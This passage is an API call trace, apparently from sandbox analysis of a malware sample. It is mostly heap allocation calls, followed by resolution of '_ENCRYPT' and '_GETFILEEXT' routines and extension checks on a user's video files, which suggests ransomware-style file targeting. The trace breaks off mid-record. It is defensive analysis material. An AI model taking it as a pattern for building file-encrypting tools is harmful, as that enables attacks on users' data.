Size=0x10) returned 0x9b9a60 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0196.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.941] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.942] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0196.943] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0196.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0196.944] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.945] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0196.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd978, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.945] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0196.945] CloseHandle (hObject=0x160) returned 1 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.946] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0196.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.947] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0196.947] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.947] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0196.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.947] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0196.947] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0196.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0196.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0x90add8 [0196.948] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, 